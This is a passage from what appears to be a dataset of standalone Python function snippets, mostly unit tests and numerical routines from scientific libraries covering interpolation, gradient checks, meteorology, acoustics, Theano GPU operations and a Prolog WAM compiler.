ctx=mx.gpu(0))\n print(\"check numeric gradient successfully for the {} times\".format(i))\n i += 1", "def f_unc(xpts, offset, *params):\n res = 0\n for i, p in enumerate(coefficients):\n res += p*xpts**i\n return res", "def _evaluate(self, w, x, y, z):\n if _isscalar(x):\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n beta = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * self.wxInterpolators[y_pos - 1][z_pos - 1](w, x)\n + (1 - alpha) * beta * self.wxInterpolators[y_pos - 1][z_pos](w, x)\n + alpha * (1 - beta) * self.wxInterpolators[y_pos][z_pos - 1](w, x)\n + alpha * beta * self.wxInterpolators[y_pos][z_pos](w, x)\n )\n else:\n m = len(x)\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.y_n):\n for j in range(1, self.z_n):\n c = np.logical_and(i == y_pos, j == z_pos)\n if np.any(c):\n alpha = (y[c] - self.y_list[i - 1]) / (\n self.y_list[i] - self.y_list[i - 1]\n )\n beta = (z[c] - self.z_list[j - 1]) / (\n self.z_list[j] - self.z_list[j - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * self.wxInterpolators[i - 1][j - 1](w[c], x[c])\n + (1 - alpha)\n * beta\n * self.wxInterpolators[i - 1][j](w[c], x[c])\n + alpha\n * (1 - beta)\n * self.wxInterpolators[i][j - 1](w[c], x[c])\n + alpha * beta * self.wxInterpolators[i][j](w[c], x[c])\n )\n return f", "def test_grad_binary(func, motion, optimized, preserve_result, a, b):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, b)", "def CalcGreenFunctions(x, y, z, x_src_l, y_src_l, alpha, dire, Lambda_y, \\\n gamma_l, c, omega, G_sen, dir_meas, dir_meas_deg, airloss_alpha, f, n):\n \n G = greens_fct(repmat(x_src_l, np.shape(x)[0],1), repmat(y_src_l, np.shape(y)[0],1), omega, c, \\\n np.transpose(repmat(x, np.shape(x_src_l)[0], 1)), np.transpose(repmat(y, np.shape(y_src_l)[0], 1)), z)\n\n G = G_sen * G\n \n beta = np.arcsin((np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1)) \\\n * np.sqrt((np.transpose(repmat(x, np.shape(x_src_l)[0], 1)) - \\\n repmat(x_src_l, np.shape(x)[0], 1))**2 + \\\n (np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1))**2)**(-1)) \\\n + repmat(gamma_l, np.shape(x)[0], 1)\n \n # air attenuation\n src_rec_dist = np.sqrt((np.transpose(repmat(x, np.shape(x_src_l)[0], 1)) - repmat(x_src_l, np.shape(x)[0], 1))**2 \\\n + (np.transpose(repmat(y, np.shape(y_src_l)[0], 1)) - repmat(y_src_l, np.shape(y)[0], 1))**2)\n \n air_att = airloss_alpha * src_rec_dist\n air_att = 10**(-air_att / 20)\n G = G * air_att\n \n H_post = calc_directivity(dire, alpha, Lambda_y, beta, omega, c, f, dir_meas, dir_meas_deg, n)\n\n G = G * H_post\n \n return G", "def border_function_generator(self, stencil):\n\n def is_on_border(indice):\n for i in range(self.dim):\n if indice[0] < stencil.b[0][0] or indice[0] >= self.mid.shape[0]+stencil.b[0][0]:\n return True\n return is_on_border", "def structure_function(f, index=0):\r\n\r\n def structured_function(*args):\r\n pattern = args[index]\r\n evaluated = f(*args)\r\n evaluated[pattern == 0] = 0\r\n return evaluated\r\n return structured_function", "def test_lifted_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n parcel_prof = parcel_profile(pressure, temperature[0], dewpoint[0])\n li = lifted_index(pressure, temperature, parcel_prof)\n assert_almost_equal(li, -7.9115691 * units.delta_degree_Celsius, 2)", "def structure_function(f, index=0):\n\n def structured_function(*args):\n pattern = args[index]\n evaluated = f(*args)\n evaluated[pattern == 0] = 0\n return evaluated\n\n return structured_function", "def pyelemfunctions():\n for elemid in unique(top.idpyelem[:top.nppyelem]):\n ip = (top.idpyelem[:top.nppyelem] == elemid)\n x = top.xpyelem[:top.nppyelem][ip]\n y = top.ypyelem[:top.nppyelem][ip]\n z = top.zpyelem[:top.nppyelem][ip]\n # --- The conversion to int is needed since a numpy.int64 is different than an int.\n (ex,ey,ez,bx,by,bz) = pyelemfunctionsdict[int(elemid)](x,y,z)\n top.expyelem[:top.nppyelem][ip] = ex\n top.eypyelem[:top.nppyelem][ip] = ey\n top.ezpyelem[:top.nppyelem][ip] = ez\n top.bxpyelem[:top.nppyelem][ip] = bx\n top.bypyelem[:top.nppyelem][ip] = by\n top.bzpyelem[:top.nppyelem][ip] = bz", "def test042_2d_numerical_comparison_on_fprop_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=None,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def past_weight_grad_calculator2(xs, es, kp_x, kd_x, kp_e, kd_e, shapes):\n kp_x, kd_x, kp_e, kd_e = [as_floatx(k) for k in (kp_x, kd_x, kp_e, kd_e)]\n n_samples, n_in, n_out = shapes\n rx = kd_x/(kp_x+kd_x)\n re = kd_e/(kp_e+kd_e)\n\n xr = create_shared_variable(np.zeros((n_samples, n_in)))\n er = create_shared_variable(np.zeros((n_samples, n_out)))\n\n\n\n\n # xr_new = xr*rx + xs/(kp_x+kd_x)\n # er_new = er*re + es/(kp_e+kd_e)\n\n arr = rx*re/(1-rx*re)\n\n xr_new = xr*arr + xs/(kp_x+kd_x)\n er_new = er*arr + es/(kp_e+kd_e)\n\n xsum = create_shared_variable(np.zeros((n_samples, n_in)))\n esum = create_shared_variable(np.zeros((n_samples, n_out)))\n\n xsum_new = xsum+xr_new\n esum_new = esum+er_new\n\n x_nospikes = tt.eq(xs, 0)\n e_nospikes = tt.eq(es, 0)\n\n dw = xs.T.dot(esum_new) + xsum_new.T.dot(es)\n\n add_update(xr, xr_new)\n add_update(er, er_new)\n add_update(xsum, xsum_new*x_nospikes)\n add_update(esum, esum_new*e_nospikes)\n\n return xs.T.dot(er) + xr.T.dot(es)\n # return xr.T.dot(er)\n # return dw", "def test_cspad_xy_at_z():\n ## 'CxiDs1.0:Cspad.0)' or 'DscCsPad'\n basedir = '/reg/g/psdm/detector/alignment/cspad/calib-cxi-camera1-2014-09-24/'\n fname_geometry = basedir + '2016-06-03-geometry-cxi06216-r25-camera1-z175mm.txt'\n fname_data = basedir + '2016-06-03-chun-cxi06216-0025-DscCsPad-max.txt'\n\n geometry = GeometryAccess(fname_geometry, pbits=0o377)\n\n # get pixel coordinate index arrays:\n xyc = xc, yc = 1000, 1000\n #rows, cols = geometry.get_pixel_coord_indexes(xy0_off_pix=xyc)\n #rows, cols = geometry.get_pixel_coord_indexes(do_tilt=True)\n #rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=None, xy0_off_pix=xyc)\n rows, cols = geometry.get_pixel_xy_inds_at_z(zplane=150000)\n\n root, ext = os.path.splitext(fname_data)\n arr = np.load(fname_data) if ext == '.npy' else np.loadtxt(fname_data, dtype=np.float)\n\n #logger.info('arr.shape=', arr.shape\n arr.shape= (32,185,388)\n\n #ave, rms = arr.mean(), arr.std()\n #amp_range = (ave-rms, ave+3*rms)\n amp_range = (0, 1000)\n logger.info('amp_range:' + str(amp_range))\n\n logger.info('shapes rows: %s cols: %s weight: %s' % (str(rows.shape), str(cols.shape), str(arr.shape)))\n img = img_from_pixel_arrays(rows,cols,W=arr)\n\n axim = gg.plotImageLarge(img,amp_range=amp_range)\n gg.move(500,10)\n gg.show()", "def test0521_2d_numerical_comparison_on_vs_np_batchsize1_mp(\n self,\n batch_size=1,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=16,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def test_window_funcs():\n # get a PSpecData\n uvd = UVData()\n uvd.read_miriad(\n os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'),\n use_future_array_shapes=True\n )\n beam = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, \"HERA_NF_dipole_power.beamfits\"))\n ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd)], beam=beam)\n ds.set_spw((0, 20))\n ds.set_taper('bh')\n bl = (37, 38)\n key = (0, bl, 'xx')\n d = uvd.get_data(bl)\n C = np.cov(d[:, :20].T).real\n iC = np.linalg.pinv(C)\n # iterate over various R and M matrices and ensure\n # normalization and dtype is consistent\n for data_weight in ['identity', 'iC']:\n ds.set_weighting(data_weight)\n for norm in ['H^-1', 'I', 'V^-1/2']:\n for exact_norm in [True, False]:\n if exact_norm and norm != 'I':\n # exact_norm only supported for norm == 'I'\n continue\n ds.clear_cache()\n if data_weight == 'iC':\n # fill R with iC\n ds._R[(0, (37, 38, 'xx'), 'iC', 'bh')] = iC\n # compute G and H\n Gv = ds.get_G(key, key, exact_norm=exact_norm, pol='xx')\n Hv = ds.get_H(key, key, exact_norm=exact_norm, pol='xx')\n Mv, Wv = ds.get_MW(Gv, Hv, mode=norm, exact_norm=exact_norm,\n band_covar=C)\n # assert row-sum is normalized to 1\n assert np.isclose(Wv.sum(axis=1).real, 1).all()\n # assert this is a real matrix, even though imag is populated\n assert np.isclose(Wv.imag, 0, atol=1e-6).all()", "def test_fortran_frontend_view_test():\n test_name = \"view_test\"\n test_string = \"\"\"\n PROGRAM \"\"\" + test_name + \"\"\"_program\nimplicit none\ndouble precision a(10,11,12)\ndouble precision res(1,1,2) \n\nCALL \"\"\" + test_name + \"\"\"_function(a,res)\n\nend\n\nSUBROUTINE \"\"\" + test_name + \"\"\"_function(aa,res)\n\ndouble precision aa(10,11,12)\ndouble precision res(1,1,2) \n\ncall viewlens(aa(:,:,1),res)\n\nend SUBROUTINE \"\"\" + test_name + \"\"\"_function\n\nSUBROUTINE viewlens(aa,res)\n\nIMPLICIT NONE\n\ndouble precision :: aa(10,11,23) \ndouble precision :: res(1,1,2)\n\nINTEGER :: JK, JL\n\nres(1,1,1)=0.0\nDO JK=1,10\n DO JL=1,11\n res(1,1,1)=res(1,1,1)+aa(JK,JL)\n ENDDO\nENDDO\naa(1,1)=res(1,1,1)\n\n\nEND SUBROUTINE viewlens\n \"\"\"\n sdfg = fortran_parser.create_sdfg_from_string(test_string, test_name)\n sdfg.simplify(verbose=True)\n a = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n b = np.full([1, 1, 2], 42, order=\"F\", dtype=np.float64)\n b[0, 0, 0] = 1\n sdfg(aa=a, res=b)\n assert (a[0, 0, 1] == 42)\n assert (a[0, 0, 0] == 4620)\n assert (b[0, 0, 0] == 4620)", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def test_special_XYX(self, angexp):\n a, b, c, d = angexp[0]\n exp = {(\"rx\", \"ry\")[g]: angexp[1][g] for g in (0, 1) if angexp[1][g]}\n tgt = np.exp(1j * d) * RXGate(b).to_matrix() @ RYGate(a).to_matrix() @ RXGate(c).to_matrix()\n self.check_oneq_special_cases(tgt, \"XYX\", exp)", "def test_ex_2_5(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n program_reg_allocation = RegisterAllocation()\n program_instrs = compiler.compile_program(program, program_reg_allocation)\n\n wam = WAM()\n wam.execute(query_instrs)\n wam.execute(program_instrs)\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_make_efuncs(exprs, nfuncs, ntimeiters, nests):\n exprs = list(as_tuple(exprs))\n\n grid = Grid(shape=(10, 10))\n t = grid.stepping_dim # noqa\n x, y = grid.dimensions # noqa\n\n u = Function(name='u', grid=grid) # noqa\n v = TimeFunction(name='v', grid=grid) # noqa\n\n # List comprehension would need explicit locals/globals mappings to eval\n for i, e in enumerate(list(exprs)):\n exprs[i] = eval(e)\n\n op = Operator(exprs)\n\n # We create one ElementalFunction for each Iteration nest over space dimensions\n efuncs = []\n for n, tree in enumerate(retrieve_iteration_tree(op)):\n root = filter_iterations(tree, key=lambda i: i.dim.is_Space)[0]\n efuncs.append(make_efunc('f%d' % n, root))\n\n assert len(efuncs) == len(nfuncs) == len(ntimeiters) == len(nests)\n\n for efunc, nf, nt, nest in zip(efuncs, nfuncs, ntimeiters, nests):\n # Check the `efunc` parameters\n assert all(i in efunc.parameters for i in (x.symbolic_min, x.symbolic_max))\n assert all(i in efunc.parameters for i in (y.symbolic_min, y.symbolic_max))\n functions = FindSymbols().visit(efunc)\n assert len(functions) == nf\n assert all(i in efunc.parameters for i in functions)\n timeiters = [i for i in FindSymbols('basics').visit(efunc)\n if isinstance(i, Dimension) and i.is_Time]\n assert len(timeiters) == nt\n assert all(i in efunc.parameters for i in timeiters)\n assert len(efunc.parameters) == 4 + len(functions) + len(timeiters)\n\n # Check the loop nest structure\n trees = retrieve_iteration_tree(efunc)\n assert len(trees) == 1\n tree = trees[0]\n assert all(i.dim.name == j for i, j in zip(tree, nest))\n\n assert efunc.make_call()", "def _evaluate(self, w, x, y, z):\n if _isscalar(w):\n x_pos = max(min(np.searchsorted(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(np.searchsorted(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(np.searchsorted(self.z_list, z), self.z_n - 1), 1)\n alpha = (x - self.x_list[x_pos - 1]) / (\n self.x_list[x_pos] - self.x_list[x_pos - 1]\n )\n beta = (y - self.y_list[y_pos - 1]) / (\n self.y_list[y_pos] - self.y_list[y_pos - 1]\n )\n gamma = (z - self.z_list[z_pos - 1]) / (\n self.z_list[z_pos] - self.z_list[z_pos - 1]\n )\n f = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos - 1](w)\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos - 1][z_pos](w)\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos - 1][y_pos][z_pos - 1](w)\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[x_pos - 1][y_pos][z_pos](w)\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos - 1][z_pos - 1](w)\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[x_pos][y_pos - 1][z_pos](w)\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[x_pos][y_pos][z_pos - 1](w)\n + alpha * beta * gamma * self.wInterpolators[x_pos][y_pos][z_pos](w)\n )\n else:\n m = len(x)\n x_pos = np.searchsorted(self.x_list, x)\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = np.searchsorted(self.y_list, y)\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n y_pos[y_pos < 1] = 1\n z_pos = np.searchsorted(self.z_list, z)\n z_pos[z_pos > self.z_n - 1] = self.z_n - 1\n z_pos[z_pos < 1] = 1\n f = np.zeros(m) + np.nan\n for i in range(1, self.x_n):\n for j in range(1, self.y_n):\n for k in range(1, self.z_n):\n c = np.logical_and(\n np.logical_and(i == x_pos, j == y_pos), k == z_pos\n )\n if np.any(c):\n alpha = (x[c] - self.x_list[i - 1]) / (\n self.x_list[i] - self.x_list[i - 1]\n )\n beta = (y[c] - self.y_list[j - 1]) / (\n self.y_list[j] - self.y_list[j - 1]\n )\n gamma = (z[c] - self.z_list[k - 1]) / (\n self.z_list[k] - self.z_list[k - 1]\n )\n f[c] = (\n (1 - alpha)\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i - 1][j - 1][k - 1](w[c])\n + (1 - alpha)\n * (1 - beta)\n * gamma\n * self.wInterpolators[i - 1][j - 1][k](w[c])\n + (1 - alpha)\n * beta\n * (1 - gamma)\n * self.wInterpolators[i - 1][j][k - 1](w[c])\n + (1 - alpha)\n * beta\n * gamma\n * self.wInterpolators[i - 1][j][k](w[c])\n + alpha\n * (1 - beta)\n * (1 - gamma)\n * self.wInterpolators[i][j - 1][k - 1](w[c])\n + alpha\n * (1 - beta)\n * gamma\n * self.wInterpolators[i][j - 1][k](w[c])\n + alpha\n * beta\n * (1 - gamma)\n * self.wInterpolators[i][j][k - 1](w[c])\n + alpha\n * beta\n * gamma\n * self.wInterpolators[i][j][k](w[c])\n )\n return f", "def test_coord_preceding_fs(self):", "def TestFunc1(x):\r\n return 12*x[0]*x[0] + 4*x[1]*x[1] - 12*x[0]*x[1] + 2*x[1]", "def test_ex_2_9(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query_m1(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n # Because there is a shared register space, we reuse the query's register allocation to\n # force the program's registers into different slots.\n program_reg_allocation = query_reg_allocation # RegisterAllocation()\n program_instrs = compiler.compile_program_m1(program, program_reg_allocation)\n program_instrs = program_instrs[:-1] # last instruction is proceed; remove it\n\n wam = WAM()\n wam.load(None, query_instrs)\n wam.load(program.get_functor(), program_instrs)\n wam.run()\n\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n\n #print 'X reg:', query_reg_allocation.reg_allocation[X], 'X addr:', aX, 'X: ', wam.get_term_repr(aX)\n #print 'Y reg:', query_reg_allocation.reg_allocation[Y], 'Y addr:', aY, 'Y: ', wam.get_term_repr(aY)\n #print 'Z reg:', program_reg_allocation.reg_allocation[Z], 'Z addr:', aZ, 'Z: ', wam.get_term_repr(aZ)\n #print 'W reg:', program_reg_allocation.reg_allocation[W], 'W addr:', aW, 'W: ', wam.get_term_repr(aW)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def apply_symm_elems_to_index_xyz(symm_elems, index_xyz, points_abc):\n b_n_1, b_n_2, b_n_3 = symm_elems[0], symm_elems[1], symm_elems[2]\n b_d = symm_elems[3]\n r_11, r_12, r_13 = symm_elems[4], symm_elems[5], symm_elems[6]\n r_21, r_22, r_23 = symm_elems[7], symm_elems[8], symm_elems[9]\n r_31, r_32, r_33 = symm_elems[10], symm_elems[11], symm_elems[12]\n i_1, i_2, i_3 = index_xyz[0], index_xyz[1], index_xyz[2]\n \n n1, n2, n3 = points_abc[0], points_abc[1], points_abc[2]\n p_1, p_2, p_3 = n1//b_d, n2//b_d, n3//b_d\n \n ni_1 = numpy.mod(r_11*i_1 + r_12*i_2 + r_13*i_3 + b_n_1*p_1, n1)\n ni_2 = numpy.mod(r_21*i_1 + r_22*i_2 + r_23*i_3 + b_n_2*p_2, n2)\n ni_3 = numpy.mod(r_31*i_1 + r_32*i_2 + r_33*i_3 + b_n_3*p_3, n3)\n ni = numpy.stack([ni_1, ni_2, ni_3], axis=0)\n return ni", "def run_test(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n for ix in range(0, num_sight_lines+1):\n # Make impact parameters covering the full\n # particle in x\n x = ix / (1. * num_sight_lines) * smoothing\n \n pencilbeams.append(\n dict(x=x, y=0),\n )\n\n results = []\n for pencilbeam in pencilbeams:\n result = testsph(h=smoothing, dim=dim, **pencilbeam)\n results.append(result)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n particle_integral = integrate.trapz([x for x in results], [x['x'] for x in pencilbeams])\n \n # \"All smoothing lengths should integrate to the same value \"\n\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n traces.append(go.Scatter(y=[x for x in results], x=[y['x'] for y in pencilbeams]))\n\n # The mass of a particle should be the area under each of these curves(?)\n plot(traces)", "def test0421_2d_numerical_comparison_on_fprop_vs_np_batchsize1_mp(\n self,\n batch_size=1,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=16,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=None,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def test_get_debug_values_success():\r\n\r\n prev_value = config.compute_test_value\r\n for mode in ['ignore', 'warn', 'raise']:\r\n\r\n try:\r\n config.compute_test_value = mode\r\n\r\n x = T.vector()\r\n x.tag.test_value = numpy.zeros((4,), dtype=config.floatX)\r\n y = numpy.zeros((5, 5))\r\n\r\n iters = 0\r\n\r\n for x_val, y_val in op.get_debug_values(x, y):\r\n\r\n assert x_val.shape == (4,)\r\n assert y_val.shape == (5, 5)\r\n\r\n iters += 1\r\n\r\n assert iters == 1\r\n\r\n finally:\r\n config.compute_test_value = prev_value", "def test_apply(buffer, window, out):\n buffer = np.array(buffer, dtype=np.float32)\n windows.apply(buffer, window)\n assert_almost_equal(buffer, np.array(out))", "def test_advinc_subtensor1():\r\n for shp in [(3, 3), (3, 3, 3)]:\r\n shared = gpuarray_shared_constructor\r\n xval = numpy.arange(numpy.prod(shp), dtype='float32').reshape(shp) + 1\r\n yval = numpy.empty((2,) + shp[1:], dtype='float32')\r\n yval[:] = 10\r\n x = shared(xval, name='x')\r\n y = tensor.tensor(dtype='float32',\r\n broadcastable=(False,) * len(shp),\r\n name='y')\r\n expr = tensor.advanced_inc_subtensor1(x, y, [0, 2])\r\n f = theano.function([y], expr, mode=mode_with_gpu)\r\n assert sum([isinstance(node.op, GpuAdvancedIncSubtensor1)\r\n for node in f.maker.fgraph.toposort()]) == 1\r\n rval = f(yval)\r\n rep = xval.copy()\r\n rep[[0, 2]] += yval\r\n assert numpy.allclose(rval, rep)", "def test_sum_pos_5() -> None:\n # Fourth step, 5th square.\n assert nth(sw.sum_walk(), 3) == 5", "def test031_1d_numerical_comparison_on_vs_np(\n self,\n batch_size=8,\n num_features=16,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def transfer_state_in_buffer(n, gate_matrix, bits, expr_buffer, gate_buffer):\n idx = calc_einsum_idx(bits, n)\n expr_buffer.append(idx)\n gate_buffer.append(gate_matrix)", "def test_member_input_flags(self):\r\n\r\n if config.mode == 'FAST_COMPILE':\r\n return\r\n\r\n M = Module()\r\n M.x = T.dvector()\r\n M.y = T.dvector()\r\n xval= numpy.asarray([0, 0.5])\r\n M.f = Method([io.In(M.x,\r\n mutable=True,\r\n update=(M.x - M.y),\r\n value=xval)], M.x + M.y)\r\n m = M.make()\r\n m.y = numpy.asarray([1, 2])\r\n\r\n assert numpy.all(m.f(xval) == [1, 2.5])\r\n assert numpy.all(xval == [-1, -1.5])", "def test_elemwise_composite_support_code():\r\n X = tcn.shared_constructor(value=numpy.zeros((100, 10), dtype=\"float32\"),\r\n name='X')\r\n W = tcn.shared_constructor(value=numpy.zeros((10, 1), dtype=\"float32\"),\r\n name='W')\r\n U = T.dot(X, W)\r\n Y = tcn.shared_constructor(value=numpy.zeros((100, 1), dtype=\"float32\"),\r\n name='Y')\r\n P = T.exp(-(Y - U) ** 2)\r\n epsilon = numpy.asarray(0.001, dtype=\"float32\")\r\n NLL = -T.mean(T.log(P + epsilon)) # SupportCodeError\r\n G = theano.gradient.grad(NLL, wrt=[W])\r\n\r\n backup = theano.config.warn.identify_1pexp_bug\r\n theano.config.warn.identify_1pexp_bug = False\r\n try:\r\n f_grad = theano.function(inputs=[], outputs=G, mode=mode_with_gpu)\r\n finally:\r\n theano.config.warn.identify_1pexp_bug = backup\r\n f_grad()\r\n\r\n topo = f_grad.maker.fgraph.toposort()\r\n assert sum([isinstance(node.op, T.Elemwise) for node in topo]) == 1\r\n #I suspect this was failing in the original branch too\r\n assert sum([isinstance(node.op, tcn.GpuElemwise) for node in topo]) == 1", "def test_1d_1d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.6)\n def func(x):\n return x**2\n \n a = func(1)\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, 1**2)\n \n a = func(2)\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, 2**2)\n \n a = func(1.5)\n self.assertEqual(len(self.storage), 2)\n self.assertAlmostEqual(a, 0.5*(1**2 + 2**2))", "def test_get_functions(sersic_2d_image,segm_and_cat):\n cat, segm, segm_deblend = segm_and_cat\n\n base_source = cat[0]\n\n source = base_source\n\n assert pf.get_source_position(source) == (base_source.maxval_xindex, base_source.maxval_yindex)\n assert pf.get_source_elong(source) == base_source.elongation.value\n assert pf.get_source_ellip(source) == base_source.ellipticity.value\n assert pf.get_source_theta(source) == base_source.orientation.to('rad').value\n\n x0, y0 = pf.get_source_position(source)\n ellip, theta = pf.get_source_ellip(source), pf.get_source_theta(source)\n\n assert np.round(pf.get_amplitude_at_r(200, sersic_2d_image, x0, y0 , ellip, theta), 6) == 0.036798", "def elemwise_checker(\n op, expected_f, gap=None, test_dtypes=None, grad_test=True, name=None, gap_grad=None\n):\n\n if test_dtypes is None:\n test_dtypes = sparse.all_dtypes\n\n class TestElemwise:\n def setup_method(self):\n super().setup_method()\n self.op = op\n self.expected_f = expected_f\n self.gap = gap\n if gap_grad is not None:\n self.gap_grad = gap_grad\n else:\n self.gap_grad = gap\n # Ensure the test's name is correct.\n assert eval(self.__class__.__name__) is self.__class__\n\n def test_op(self):\n for format in sparse.sparse_formats:\n for dtype in test_dtypes:\n if dtype == \"int8\" or dtype == \"uint8\":\n continue\n\n # When testing with 